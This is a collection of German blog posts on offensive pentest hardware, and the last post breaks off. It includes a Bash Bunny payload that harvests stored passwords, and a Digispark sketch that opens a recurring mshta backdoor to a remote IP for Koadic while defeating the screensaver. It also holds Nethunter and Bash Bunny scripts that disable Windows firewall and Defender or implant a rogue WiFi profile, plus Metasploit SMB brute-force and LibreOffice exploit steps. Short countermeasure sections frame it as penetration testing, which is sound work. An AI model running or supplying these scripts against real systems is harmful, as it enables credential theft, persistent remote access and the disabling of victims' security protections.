Hardware und Formfaktor

Legt man die „Hasen“ nebeneinander, so sind keine großen Unterschiede zu erkennen. Der Nachfolger ist etwas dicker, obwohl sich die Hardwarespezifikationen kaum geändert haben. Der Mark II verfügt nun über 1 GB RAM (Vorgänger 512 MB), einem MixroSD XC Laufwerk mit einer max. Kapazität von 2 TB und über Bluetooth LE.

Auch in diesem Gerät werkelt eine Quad-Core A7 CPU mit 1,3 Ghz, die wohl weiterhin sehr ausreichend für die zahlreichen Anwendungen sein sollte.

Neuerungen

Die wesentlichen Unterschiede sind auf der Webseite des Herstellers zusammengefasst.

Wenn man es genau betrachtet, so lassen sich die Änderungen im einem Satz zusammenfassen. Die Hersteller machen das folgendermaßen:

„The Bash Bunny Mark II adds mass exfiltration, wireless geofencing and remote trigger functionality via a MicroSD XC card reader and bluetooth low-energy radio.“

https://://docs.hak5.org/hc/en-us/articles/4402980129179-Bash-Bunny-Mark-II-Considerations

Im Bereich “Wireless” fügen sie die neuen Funktionen „WAIT_FOR_PRESENT“  und „WAIT_FOR_NOT_PRESENT“ hinzu.  Penetrationstester sind damit in der Lage, ihre Skripte so anzupassen, dass sie auf die „Anwesenheit“ bestimmter Bluetooth-Geräte reagieren. 

Beispiel:

Soll das Skript erst fortgesetzt werden, wenn ein Bluetooth-Signal eines Mobiltelefons mit dem Namen „myphone“ präsent ist, so fügt man folgenden Befehl ein:

WAIT_FOR_PRESENT myphone

Im Bereich „Storage“ kommen die diversen Möglichkeiten hinzu, die der Anwender durch das zusätzliche Micro-SD-Laufwerk hat. Je nach Angriffsmethode ergeben sich eine Reihe von Einsatzmöglichkeiten. Die wesentlichen Unterschiede finden Sie in der Dokumentation.

Erster Test mit dem Bash Bunny Mark II

Da wir immer kleine Datenmengen auf dem Bash Bunny gespeichert haben, hat uns der bereits im Vorgänger zur Verfügung gestellte Datenspeicher völlig ausgereicht. Die zusätzlichen Möglichkeiten (bis zu 2 TB) sind daher für uns eher nicht interessant. Die „Remote Trigger“-Funktion wollen wir uns aber etwas genauer ansehen.

Denkbar wäre hier eine Szenario in dem der Penetrationstester den Bash Bunny an einem Windows PC platziert und so lange wartet bis der Anwender das Gerät entsperrt, um es zu nutzen. Erst dann schaltet er Bluetooth auf seinem Gerät „myphone“ ein und löst dann dass Skript zum Abgreifen der Passwörter aus.

Wir verwenden dafür den Payload „PasswordGrabber“, der bei Github heruntergeladen werden kann. Mit ihm ist der Anwender in der Lage, gespeicherte Passwörter aus verschiedenen Anwendungen (z.B. Browsern) oder WLAN-Verbindungen auszulesen. Dabei kommt das Tool LaZagne zum Einsatz. Die exe-Datei muss daher von der Webseite heruntergeladen und auf dem BashBunny im Verzeichnis /tools gespeichert werden. Verwenden Sie dazu den Arming Mode des Bash Bunny.

Hinweise: Der Microsoft-Defender stuft dieses Werkzeug als maliziös ein. Passen Sie daher ihr Testsystem so an, dass es nach dem Download nicht automatisch gelöscht wird.

Die Dateien payload.ps1 und payload.txt kopieren Sie in eines der beiden Payload-Verzeichnisse des Bash Bunny.  Sie können die Daten dann später mit dem roten Schalter entweder aus Switch1 oder Switch2 abrufen. 

Hinweis: Die Schalterstellung Arming Mode befindet sich am dichtesten zur USB-Schnittstelle des Bash Bunny und Switch1 am entferntesten. 

Nun müssem wir die Datei payload.txt noch anpassen, um die Remote Trigger Funktion zu nutzen. Für unseren Test sieht das dann so aus:

# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

######## MAKE LOOT DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR

######## WAIT FOR phone ########
ATTACKMODE STORAGE
LED STAGE1
WAIT_FOR_PRESENT Find Me

######## ATTACK ########
LED ATTACK
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
# Wait until passwords are grabbed.
sleep 10

######## FINISH ########
LED FINISH

Um das Bluetooth-Signal zu erzeugen, das dann den „Remote Trigger“ auslöst, benutzen wir ein IPhone mit der App „BLE Scannner“. Dazu habe wir einen „Advertiser“ mit Name „Find Me“ erstellt.

Sobald der Bunny das Signal erkennt, wird das Powershell-Skript payloads.ps1 gestartet und die gefundenen Passworte im /loot Verzeichnis des Bash Bunny gespeichert.

Eine Demonstration der neuen Funktion sehen sie im folgenden Video:

Unser Fazit

Der Nachfolger des Bash Bunny ist für Penetrationstester interessant, die große Datenmengen verarbeiten oder die Remote Trigger Funktionen für ihre Prüfungen benötigen.

Einen WLAN-Zugang und eine lokale Webseite für eine komfortable Konfiguration des „Hasen“ sucht man weiterhin vergeblich.

Wer den Vorgänger besitzt und die neuen Funktionen nicht benötigt, sollte das Geld für den Kauf eines zusätzlichen Gerätes sparen. Derzeit ist das Werkzeug in den USA ab 119,99 $ + Versand und Zollgebühren und in Deutschland für 145 € zzgl. Versand erhältlich. 

Der Beitrag Erster Test mit Bash Bunny Mark II erschien zuerst auf .

Tatsächlich brauchte es nicht viel, um die Backdoor mittels Keystroke-Injection zu erzeugen. Zu diesem Zweck könnte man mshta.exe verwenden. Diese Datei ist standardmäßig im Windows-Betriebssystem vorhanden und braucht daher nicht erst auf das Zielobjekt übertragen zu werden.

MsHTA steht für Microsoft HTML Application. Dieser Prozess gilt als sicher und stellt normalerweise keine Gefahr für ein Windows-System dar. Die Datei ‚mshta.exe‘ befindet sich standardmäßig im Ordner C:\Windows\System32 und kann problemlos mit Nutzerrechten aufgerufen werden.

Wie läuft der Angriff ab?

Ohne den neuen Lesern die Spannung zu nehmen, kann man verraten, dass mithilfe des Digisparks (1) eine Verbindung zum Angreifer hergestellt wird. Um die Firewall zu umgehen, sollte dies über einen Port geschehen, der für den Verkehr von innen nach außen geöffnet ist. Das könnte z.B. Port 443 sein, der vorrangig für das Surfen im Internet benutzt wird. Das Zielsystem, als Beispiel wird hier ein Windows-10-PC genutzt, ruft die Webseite „http://112.23.137.77:443/eagle“ auf. Im Skript kann man sehen, dass dies automatisch mittels Keystroke-Injection passiert. (IP-Adresse ist fiktiv).

Der Server (2) mit der IP-Adresse 112.23.137.77 nimmt die Verbindung an und stellt eine permanente Verbindung zum Zielobjekt her. Hierzu wird die Software Koadic verwendet, die diese Verbindungen als „Zombies“ verwaltet. Ich habe das Post-Exploitation-Framework bereits in unserem Buch, in einem Artikel der iX und auf dieser Webseite ausführlich vorgestellt.

Welche „Hürden“ müssen überwunden werden.

1. Keystroke-Injektion funktioniert natürlich nur, wenn ein Nutzer sich im System angemeldet hat und den Bildschirm frei für Eingaben macht. Ist er gesperrt, so bring z.B. das Tastenkürzel Windows+R, welches den „Ausführen-Dialog“ öffnet, nicht den gewünschten Effekt.
2. Ist der PC einmal offen, so kann es sein, dass der Nutzer das Gerät nach einer gewissen Zeit wieder verlässt. In der Regel greift dann der Bildschirmschoner, der das Gerät nach einer vorgegebenen Zeit automatisch sperrt.
3. Ist das Zielsystem ausgeschaltet, so kann selbstverständlich keine Verbindung zum Angreifer aufgebaut werden. Hier müssen wir gewährleisten, dass nach dem Einschalten und während der Nutzung immer wieder neue Verbindungen zum Angreifer aufgebaut und neue „Zombies“ erstellt werden.

Digispark – „Der Wolf im Schafspelz“

Digispark ist eine  Entwicklungsplatine auf Basis eines Attiny85. Er lässt sich direkt mit dem USB-Port eines Rechners verbinden und mit der Arduino-Entwicklungsumgebung  programmieren.

Technische Details:

• Unterstützt die Arduino IDE (erhältlich für OSX/Win/Linux)
• Stromversorgung über USB oder eine externe Quelle – 5V oder 7-35V 
• On-board 500mA 5V Regler
• Built-in USB
• 6 I/O Pins 
• 8kB Flash-Speicher (ca. 6kB effektiv verfügbar)
• I2C und SPI
• PWM auf 3 Pins
• ADC auf 4 Pins
• Power LED und Test/Status LED (auf Pin 0)

Arduino Entwicklungsumgebung

In diesem Beitrag habe ich gezeigt, wie Sie die Arduino Entwicklungsumgebung für den Digispark in einem Windows-Betriebssystem einrichten. Wer lieber mit Linux arbeitet, wird im Buch eine entsprechende Anleitung finden.

Achtung: Da die Originaldateien auf das US-Tastaturlayout zugeschnitten sind, müssen Nutzer einer deutschen Tastatur folgende Dateien austauschen:

• DigiKeyboard.h
• scancode-ascii-table.h

Sie werden diese Dateien ja nach Betriebssystem und Installation in den Nutzerdaten finden. In meiner Entwicklungsumgebung unter Windows wurde ich hier fündig:

C:\Users\frank\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard

Laden Sie die Dateien für ein deutsches Tastaturlayout hier herunter.

Dieses Skript soll helfen, die Probleme zu lösen

Die Variable „interval“ gewährleistet, dass das Zielsystem alle 30 Minuten eine neue Verbindung zum Angreifer aufnimmt. Die Werte sind in Millisekunden anzugeben.

Wir gehen die diesem Beispiel davon aus, dass der Bildschirm nach ca. zwei Minuten Inaktivität, automatisch gesperrt wird. Wenn jede Minute etwas auf der Tastatur passiert, dann sollte dies nicht der Fall sein. Die Variable „antiscreensaver“ legt fest, in welchem Zeitintervall, zu diesem Zweck, die Leertasten und Backspacetaste „gedrückt“ werden. Dies hat zur Folge, dass der Bildschirmschoner nicht aktiviert wird und weitere Verbindungsaufnahmen stattfinden können. Nach Möglichkeit sollten Sie diese Zeitspanne, je nach den Einstellungen auf dem Zielsystem, etwas größer wählen.

#include "DigiKeyboard.h"

long previousMillis = 0;
long interval = 1800000;        //  30 minutes
long antiscreensaver = 60000;   //   1 minute

void setup() {
  // don't need to set anything up to use DigiKeyboard
}

void loop() {
  DigiKeyboard.sendKeyStroke(0);
  unsigned long currentMillis = millis();
  if(currentMillis - previousMillis > interval) {
     DigiKeyboard.delay(2000);
     DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
     DigiKeyboard.delay(2000);
     DigiKeyboard.println("cmd /c start /MIN mshta http://112.23.137.77:443/eagle");
     previousMillis = currentMillis;
  }
  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(KEY_SPACE);
  DigiKeyboard.sendKeyStroke(KEY_BACKSPACE);
  DigiKeyboard.delay(antiscreensaver);
}

Post-Exploitation-Framework einsetzen

Mit Koadic haben Sie nun alle Möglichkeiten auf dem Zielsystem zu agieren. Das Werkzeug liefert Module, um auf Zielsystem zuzugreifen, Daten zu kopieren oder die Rechte zu erweitern.

Die diesem Beispiel wurde ein Kommando-Shell geöffnet und der Dateninhalt angezeigt.

Gegenmaßnahmen

Es ist im täglichen Betrieb nicht leicht, einen Digispark zu finden, der in eine freie USB-Schnittstelle gesteckt wurde. Regelmäßige Kontrollen würden hier natürlich helfen.
Außerdem ist das oben gezeigte Skript nicht perfekt. Auch wenn jemand mehr „Herzblut“ in die Sache steckt, wird es immer ein Keystroke-Injection-Angriff bleiben. Dies bedeutet, dass der Angreifer Befehle ausführen wird, die möglicherweise auf dem Bildschirm sichtbar sind.
Wenn der Bildschirmschoner nicht startet oder der Bildschirm nicht automatisch gesperrt wird, sollten der Nutzer stutzig werden und der Sache nachgehen.
Ein Virenschutzprogramm auf einem Windows-System könnte eventuell den Angriff erkennen und abwehren.
Wer einen Proxy-Server für die Verbindung ins Internet nutzt und hier sogar eine Authentifizierung gewählt hat, sollte ebenfalls auf der sicheren Seite sein.

Das folgende Video zeigt, was vom Angriff für den Nutzer zu sehen ist und welche Schritte ein Angreifer unternimmt, um wichtige Dateien herunterzuladen:

Der Beitrag Backdoor Roman – Spoiler Alarm! erschien zuerst auf .

Auch wenn unsere Videos keine Aufforderung zu Straftaten sein sollen und niemals dafür gedacht waren, so beinhalten Sie teilweise gefährliches Potential, dass missbraucht werden könnte.

YouTube lässt automatisch den hochgeladenen Inhalt nach ihren Richtlinien durchsuchen und sperrt Videos, die möglicherweise nicht den Vorgaben entsprechen. Dabei kann die eingesetzte „künstliche Intelligenz“ oftmals nicht unterscheiden, ob es sich hierbei um seriöse Darstellungen von Penetrationstestern oder Inhalt von einem „Script Kiddie“ handelt.

Dies führt dazu, dass einzelne Videos gelöscht und im Wiederholungsfall der Kanal gesperrt werden. Nutzer haben die Möglichkeit Widerspruch einzulegen. Dies ist aber eine sehr zeitaufwendige und nervige Angelegenheit.

Wir haben uns daher entschlossen, alle diesbezüglichen Videos aus unserem YouTube Kanal zu entfernen.

Der Beitrag Alle Videos aus unserem YouTube-Kanal entfernt! erschien zuerst auf .

Neben den klassischen Tools von Kali Linux lässt sich Nethunter für HID Keyboard Angriffe bzw. BAD-USB Angriffe und als WLAN-Accesspoint für die sogenannten MANA-Angriffe einsetzen.  Eine vollständige Liste der verfügbaren Werkzeuge dieser mobilen Testplattform finden Sie in der Dokumentation.

Wie Sie Nethunter als MANA Evil-Accesspoint einsetzen können, haben wir in einem früheren Beitrag bereits vorgestellt.  Hier werden wir Ihnen zeigen, wie Sie das Gerät für HID-Angriffe auf einen Windows 10-PC nutzen können und mittels des Programms wifite die WLAN-Sicherheit der umliegenden Netzwerke testen können.

Nethunter HID Keyboard Angriff

Auf dieser Webseite finden Sie viele Tools und Beispiele, die Ihnen helfen HID-Angriffe auf den verschiedenen Betriebssystemen ausführen. Kali Nethunter ist in der Lage, die klassischen Ducky-Skripte zu übernehmen bzw. in ein eigenes Format zu konvertieren. Die installierte Software kommt mit einigen Beispielen, die Sie sofort anwenden können.

In unserem Szenario möchten wir den Windows Defender und die auf einem Windows 10-PC verfügbaren Firewalls mit Hilfe eines HID-Angriffs abschalten. Ein weiteres Skript soll dann helfen, alle Komponenten wieder zu starten.

Wer sich mit dem USB Rubber Ducky und Co. schon ein wenig beschäftigt hat, der wird die einfachen Skripte kennen, mit deren Hilfe die Tastatureingaben auf den Zielsystemen ausgeführt werden. In sehr vielen Fällen war es notwendig, diverse Verzögerungen einzubauen, um mehr Zeit für die Verarbeitung der einzelnen Befehle zu erlangen. Dies wurde oftmals mit dem Befehl „DELAY“ erreicht. Auch waren bestimmte Anweisungen notwendig, um Befehle mit administrativen Rechten ausführen zu können.

Kali Nethunter kann zwar diese Skripte auch weiterhin verarbeiten, bringt aber auch ein eigenständiges Konzept mit, das ohne zusätzliche Kommandos für eine Verlangsamung auskommt und dadurch das Erstellen der Skripte wesentlich vereinfacht.

Skript erstellen und auf dem Nexus abspeichern

Als Beispiel haben wir folgendes Skript erstellt, das zunächst die Firewalls, dann den Windows Defender abschaltet und danach den PC neu startet:

*powershell
set-Netfirewallprofile -profile private,public,domain -enabled false
Set-ItemProperty 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' DisableAntiSpyware 1 
restart-computer

Am einfachsten ist es, wenn Sie per SSH auf den Nexus zugreifen, dann mit Hilfe eines Editors (z.B. nano) das Skript erstellen und zum Abschluss in einem beliebigen Verzeichnis abspeichern. Wir haben folgenden Ordner gewählt:

 /storage/emulated/0/nh_files/scripts/hid

Auf dem Nexus werden Sie im Kali Nethunter Menü den Eintrag „HID Attacks“ finden. Ein Klick darauf bringt Sie zu diversen Beispielen, die sofort genutzt werden können.

Um das von Ihnen erstellte Skript auszuwählen, nutzen Sie die Option „LOAD FROM SDCARD“ und navigieren Sie zu dem entsprechenden Ordner.

Skript anpassen, Optionen auswählen und Angriff starten

Wie schon oben erwähnt ist es hilfreich, wenn man Befehle mit administrativen Rechten ausführen kann. In diesem Fall stellt Nethunter schon eine vorgefertigte Option zur Verfügung, die Sie nur noch auswählen müssen.

Klicken Sie dazu auf das rechte Menü (drei Punkte) und wählen dort die Option „UAC Bypass“ aus.

Hier können Sie das Betriebssystem ausgewählt, das auf dem Zielsystem installiert ist.

Es ist außerdem wichtig, dass passende Tastatur-Layout auf dem Zielsystem anzugeben.

Verbinden Sie nun den Nexus mit dem Zielsystem mittels eines USB-Kabels und starten Sie den Angriff über dem Menü-Punkt „Execute Attack“.

Wie Sie sehen konnten nimmt Nethunter uns, im Vergleich zu anderen Werkzeugen, einige Arbeit ab. Wir müssen uns keine Gedanken über Verzögerungen, Tastatureingaben (wie z.B. Enter, Windows-Taste etc.) usw. machen. Dadurch lassen sich die Skripte wesentlich kürzer gestalten und werden dadurch enorm übersichtlich.

Abgesehen davon müssen wir noch folgende Anmerkungen zum Skript machen:

Der Stern (*) am Anfang der ersten Zeile ist besonders wichtig. Wird er vergessen, so gibt es bei der Ausführung eine Fehlermeldung.

In der zweiten Zeile werden die verschiedenen Firewalls auf einem Windows-System abgeschaltet.

In Zeile 3 haben wir einen Eintrag in der Windows-Registry vorgenommen, die den Windows-Defender mit allen Optionen abschaltet. Nach einem Neustart des Zielsystems (Befehl in Zeile 4) kann der Nutzer den Virenschutz auch nicht mehr manuell anstellen (siehe Video). Erst eine Änderung des Wertes von 1 auf 0, bewirkt eine Rückkehr in den Urzustand.

Es ist also hilfreich, wenn man ein weiteres Skript zur Verfügung hat, das diese Einstellungen wieder rückgängig macht:

*powershell
set-Netfirewallprofile -profile private,public,domain -enabled true
Set-ItemProperty 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' DisableAntiSpyware 0
restart-computer

Das folgende Video zeigt die Vorgehensweise:

Gegenmaßnahmen

Wie Sie im Video sehen konnten, benötigt Nethunter administrative Rechte, um die entsprechenden Einstellungen auf dem Windows-System vorzunehmen. Hat man aber die Standardeinstellung von Windows 10 gewählt, so lassen sich diese Rechte leicht erlangen, da während der JA/Nein Abfrage kein Passwort angegeben werden muss. Wir empfehlen, dieses Verhalten durch einen Eintrag in der Windows-Registry zu ändern.

WLAN-Sicherheit prüfen

Mit Hilfe des Tools wifite können Sie Sicherheit von WLAN-Netzwerken prüfen und WPS-Sicherheitslücken erkennen. Die Anwendung ist einfach und kann direkt aus dem Kali-Terminal gestartet werden. Schließen Sie dazu, wie im ersten Teil erläutert, den externen WLAN-USB-Adapter an den Nexus 7 an und prüfen, ob die Schnittstelle wlan1 in der ifconfig-Abfrage angezeigt wird.

Ein einfacher Aufruf mit dem Programmnamen zeigt nach wenigen Sekunden die verfügbaren WLAN-Schnittstellen an. Wählen Sie hier Ihren externen Adapter aus. In unserem Fall haben wir die Option 3 gewählt.

Alternativ können Sie aber auch weitere Optionen beim Start des Programmes auswählen. Die Option -h listet alle verfügbaren Parameter auf. Wenn Sie z.B. nur nach Netzwerken suchen wollen, die über eine WEP-Verschlüsselung verfügen, so können Sie das Programm wie folgt aufrufen:

wifite -i wlan1mon  --wep

Danach beginnt wifite alle umliegenden Netzwerke zu scannen und die gefundenen Informationen aufzulisten. Diesen Vorgang können Sie mit der Tastenkombination CTRL-C beenden und dann nach Auswahl des Netzwerkes mit der Sicherheitsprüfung beginnen.

Da ihr Nethunter über eine weitere Netzwerkschnittstelle (wlan0) verfügt, kann diese Prüfung auch remote über eine ssh-Verbindung erfolgen.

Der Beitrag Kali Nethunter 2020 – Teil 2 Anwendungen erschien zuerst auf .

Wie gefährlich dies unter Umständen sein kann, möchte ich im folgenden Beitrag nachweisen.

Das Szenario

Der Angreifer platziert einen mobilen Access Point (1) in die Nähe des Zielobjektes. Nun wartet er ab, bis der Nutzer des Zielsystems (2) das Notebook einen kurzen Moment unbeaufsichtigt lässt und installiert mit Hilfe des Bash Bunny (3) ein WLAN-Profil auf den PC. Somit hat er eine permanente WLAN-Verbindung geschaffen, die bestehen bleibt bzw. immer wieder hergestellt wird, sobald der Nutzer sich mit seinem Notebook in der Nähe des Access Points aufhält. Da sich nun auch der Angreifer mit seinem Notebook (4) im Empfangsbereich des Access Points aufhält, kann er mit Hilfe vom Kali Linux und Metasploit das Login Passwort auf den Opfer-PC erlangen.

Was wird benötigt?

Hardware

• Raspberry Pi 3 oder 4
• USB Long-Range USB-Adapter
• Netzteil für Raspberry Pi oder besser ein PowerPack
• Bash Bunny oder P4wnP1 für den HID-Angriff

Software

• Raspap-webgui
• Metasploit-Framework

Zuerst die Theorie

Jede etablierte WLAN-Verbindung wird auf dem Windows-PC als Profil gespeichert. Diese Profile lassen sich mit dem Windows-Befehl netsh anzeigen, löschen, exportieren oder einrichten. Nachfolgend einige Beispiele:

#Alle gespeicherten Profile anzeigen
netsh wlan show profiles

#WLAN-Profil „T-Mobil“ in xml-Datei ins Verzeichnis c:\users\name\desktop exportieren
#Mit key=clear wird das WLAN-Passwort in der xml-Datei gespeichert.
netsh wlan export profile name=“T-Mobile“ key=clear folder=c:\users\name\desktop

#Profil „T-Mobil“ löschen
netsh wlan delete profile name=“T-Mobil“

#Windows-PC mit einem WLAN verbinden
netsh wlan set hostednetwork mode=allow ssid=SSID key=password
netsh wlan start hostednetwork
netsh firewall set opmode disable

WLAN-Profile erstellen und exportieren – grundsätzliche Vorgehensweise

Wir gehen davon aus, dass Sie einen Access Point mit dem Raspberry Pi erstellt haben. Gute Anleitungen finden Sie hier oder hier.

WLAN-Profil in xml-Datei exportieren:

Zunächst sollten Sie das WLAN-Profil mittels eines Windows 10-PC auslesen. Verbinden Sie sich mit dem Access Point und exportieren Sie es als xml-Datei auf den Desktop des PC.

netsh wlan export profile name=“Telkom“ key=clear folder=C:\Users\frank\desktop

In diesem Fall erhalten wir die Datei WLAN-Telkom.xml mit folgendem Inhalt.

Powershell-Skript erstellen

Als nächstes erstellen sie eine einfache Textdatei mit folgendem Inhalt und speichern diese als wlan-connect.ps1 ab:

netsh wlan add profile filename="WLAN-Telkom.xml“

HID-Skript für den Keystroke-Injection-Angriff mit Hilfe des Bash Bunny

Für unser Vorhaben benötigen wir zwei Dateien. Ein Powershell-Skript, das wesentliche Inhalte der oben beschriebenen Dateien enthält. Es wurde mit verschiedenen Variablen und Befehlen ergänzt, um flexibel einsetzbar zu sein.

Außerdem erstellen wir eine Payload-Datei, die später vom Bash Bunny ausgeführt werden kann.

Powershell-Skript –  wifiprofile.ps1

# Fill in mandatory details for the WiFi network
$WirelessNetworkSSID = 'Telkom'
$WirelessNetworkPassword = 'Telkom2020'
$Authentication = 'WPA2PSK' # Could be WPA2
$Encryption = 'AES'

# Create the WiFi profile, set the profile to auto connect
$WirelessProfile = @'
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
	<name>{0}</name>
	<SSIDConfig>
		<SSID>
			<name>{0}</name>
		</SSID>
		<nonBroadcast>true</nonBroadcast>
	</SSIDConfig>
	<connectionType>ESS</connectionType>
	<connectionMode>auto</connectionMode>
	<MSM>
		<security>
			<authEncryption>
				<authentication>{2}</authentication>
				<encryption>{3}</encryption>
				<useOneX>false</useOneX>
			</authEncryption>
			<sharedKey>
				<keyType>passPhrase</keyType>
				<protected>false</protected>
				<keyMaterial>{1}</keyMaterial>
			</sharedKey>
		</security>
	</MSM>
</WLANProfile>
'@ -f $WirelessNetworkSSID, $WirelessNetworkPassword, $Authentication, $Encryption

# Create the XML file locally
$random = Get-Random -Minimum 1111 -Maximum 99999999
$tempProfileXML = "$env:TEMP\tempProfile$random.xml"
$WirelessProfile | Out-File $tempProfileXML

# Add the WiFi profile and connect
Start-Process netsh ('wlan add profile filename={0}' -f $tempProfileXML)

# Connect to the WiFi network - only if you need to
Start-Process netsh ('wlan connect name="{0}"' -f $WirelessNetworkSSID)

Im oberen Teil des Skriptes haben Sie die Möglichkeit die Parameter des von Ihnen genutzten Access Points einzupflegen.  Im unteren Bereich werden die notwendigen Befehle auf dem Windows PC ausgeführt.

Bash Bunny Payload – payload.txt

#!/bin/bash
#
# Title:         Implant Wifi Profile in Windows PC
# Author:        pentestit.de	
# Version:       1.1
# Target:        Windows 10
# 
#The PowerShell script creates a WiFi Profile on a Windows PC 

#Executes wifiprofile.ps1

# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED SETUP
ATTACKMODE HID STORAGE
LED ATTACK
Q  GUI r
Q  DELAY 1000
Q  STRING powershell start-process powershell -Verb runas
Q  ENTER
Q  DELAY 1000
Q  LEFTARROW
Q  DELAY 10000
Q  ENTER 
Q  DELAY 1000
Q  STRING set-Netfirewallprofile -profile private -enabled false
Q  ENTER	
Q  DELAY 1000
Q  STRING exit
Q  ENTER
Q  DELAY 1000 
Q  GUI r
Q  STRING powershell -ExecutionPolicy bypass -windowstyle hidden ".((gwmi win32_volume -f 'label=''BASHBUNNY''').Name+'payloads\\$SWITCH_POSITION\wifiprofile.ps1')"
Q  ENTER
LED FINISH

Mittels des Befehles „ATTACKMODE HID STORAGE“ wird der Bash Bunny als „Speichermedium“ genutzt. Dadurch haben wir die Möglichkeit das Powershell-Skript wifiprofile.ps1 direkt vom USB-Gerät zu starten. Eine anderweitige Übertragung (z.B. aus dem Internet) wird damit überflüssig.

Gemäß unserem Szenario muss nun noch der Bash Bunny an „Opfer-Notebook“ angeschlossen werden. Der Payload wird automatisch ausgeführt und dies erzeugt das notwendige WLAN-Profil für den angemeldeten Nutzer. Der Angreifer kann sich nun ebenfalls im Netzwerk anmelden und den Passwort-Angriff durchführen.

Brute-Force Angriff mit Hilfe von Metasploit

Um an das Login-Passwort des angemeldeten Nutzers zu gelangen, benötigen wir eine Sammlung möglicher Passwörter und ein Metasploit-Modul aus dem Framework.

Passwortliste erstellen

Hier haben Sie unendlichen Möglichkeiten. Entweder greifen Sie auf fertige Listen zurück oder Sie nutzen einen der Passwort-Generatoren und füllen die Datei mit Ihren eigenen Inhalten. Kali Linux 2020.1 stellt eine Vielzahl dieser Listen im Verzeichnis /usr/share/seclists/Passwords/ zur Verfügung. In die Datei userlist.txt tragen Sie die möglichen Nutzernamen ein, die auf dem PC verwendet werden.

Metasploit-Modul und Ressource-Datei

Nun muss noch eine Ressource-Datei (smb.rc) erstellt werden, die folgenden Inhalt haben könnte:

se auxiliary/scanner/smb/smb_login
set RHOSTS 10.3.141.223
set STOP_ON_SUCCESS true
set USER_FILE userlist.txt
set PASS_FILE /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt
run

Tragen Sie hier unter RHOST die IP-Adresse des Ziels ein und starten Sie die Metasploit-Konsole zusammen mit der Ressource-Datei:

msfconsole -r smb.rc 

Das Metasploit-Module arbeitet nach und nach im Hintergrund die Passwörter in der Liste ab und beendet die Suche sobald das passende Kennwort gefunden wurde.

Gegenmaßnahmen

Unbefugte sollten niemals Zugang zum eigenen PC erlangen, um diesen HID-Angriff starten zu können.

Normalerweise arbeitet jeder Nutzer auf einem Windows System mit Benutzerrechten. Sobald eine Anwendung erweiterte Berechtigungen benötigt, wird ein Dialogfeld angezeigt. Hier muss der Nutzer nun bestätigen, dass das aufgerufene Programm mit administrativen Rechten ausgeführt werden kann. Im Gegensatz zu einem Linux-Betriebssystem sieht Windows standardmäßig hierfür nur ein Ja/Nein Abfrage vor. Ein anderes Verhalten können Sie aber in der Registry einstellen.

Wenn einmal ein entsprechendes WLAN-Profil eingerichtet wurde, bleibt es bis zum Löschen gespeichert. Standardmäßig versucht der PC ,bei entsprechender Verfügbarkeit, eine Verbindung aufzubauen. Sie können versuchen, nicht mehr benötigte Profile mit den o.g. Befehl zu löschen.

Der Access Point ist in diesem Beispiel so konfiguriert, dass der Netzwerkname nicht in der Liste der verfügbaren Drahtlosnetzwerke angezeigt wird. Somit lässt sich die Gefahr noch schwerer erkennen.

Als zuverlässigen Schutz bleibt hier nur das WLAN am PC manuell abzuschalten, wenn es unterwegs nicht benötigt wird.

Das folgende Video zeigt die Vorgehensweise:

Der Beitrag Brute Force Windows Login mit Rogue Access Point erschien zuerst auf .

Aber auch hier lauern gefahren, die nicht zu unterschätzen sind. Leider tauchen auch bei diesem Produkten immer wieder Schwachstellen auf, die Zugriff auf das Betriebssystem gestatten und das Einschleusen von Schadsoftware ermöglichen. In diesem Beitrag hatte ich bereits darüber berichtet.

Aktuell läßt sich mit Hilfe von LibreLogo, der in LibreOffice integrierten Python-Umgebung, beliebiger Programmcode innerhalb eines Office-Dokuments ausführen. Der Empfänger eines solchen Dokuments erhält keine Warnmeldung, die auf möglichen Schadcode in dieser Datei hinweist.

Es sind alle Versionen von LibreOfiice bis zur Version 6.2.5 und die gängigen Betriebssysteme, wie Windows, Linux und macOS betroffen. Die „Document Foundation“ hat entsprechende Advisories veröffentlicht.

Im Folgenden zeige ich, wie man mit Hilfe des Metasploit-Frameworks ein solches LibreOffice-Dokument erzeugt und eine Meterpreter-Session erlangt.

LibreOffice-Dokument erzeugen

Das entsprechende Modul finden Sie am schnellsten, wenn Sie z.B. folgenden Befehl in die Metasploit-Konsole eingeben:

use LibreOffice

Die verfügbaren Module werden jetzt in einer Liste angezeigt, aus der sich dann das passende ausgewählt läßt:

Sie müssen nun noch die Parameter LHOST und LPORT entsprechend Ihrer Testumgebung anpassen. Das Libreoffice-Dokument wird danach im Verzeichnis /root/.msf4/local gespeichert.

Handler erzeugen und Dokument auf den Zielsystemen starten

Um die empfangenen Daten von den Zielsystemen zu verarbeiten, müssen Sie nun noch den passenden Multi-Handler erstellen:

Der komplette Ablauf wird im folgendem Video gezeigt:

Der Beitrag LibreOffice Python Code Execution mit Metasploit erschien zuerst auf .

SMB-Bruteforce-Angriffe werden im Rahmen eines Penetrationstests eingesetzt, um die Wirksamkeit der Kennwortrichtlinien zu überprüfen bzw. potenzielle Angriffsmethoden zu identifizieren.  Dabei wird versucht, systematisch und automatisch, Benutzernamen- und Passwortkombinationen zu erraten. Ziel dabei ist, gültige Anmeldedaten zu finde, die sich als Zugang zu einem Zielnetzwerk nutzen lassen.

Das Metasploit Framework stellt diverse Module bereit, die Sie für Ihre Tests nutzen können.

Der P4wnP1, entwickelt von MaMe82, hat sich als universelles Werkzeug bewährt, mit dem Sie solche Tests durchführen können.  Im folgenden Beitrag erläutere ich, wie Sie automatisiert eine Datei mit potentiellen Passworten erstellen und den P4wnP1 so einrichten, dass er automatisiert nach dem richtigen Passwort sucht und damit einen Windows 10 PC entsperrt.

Grundlagen

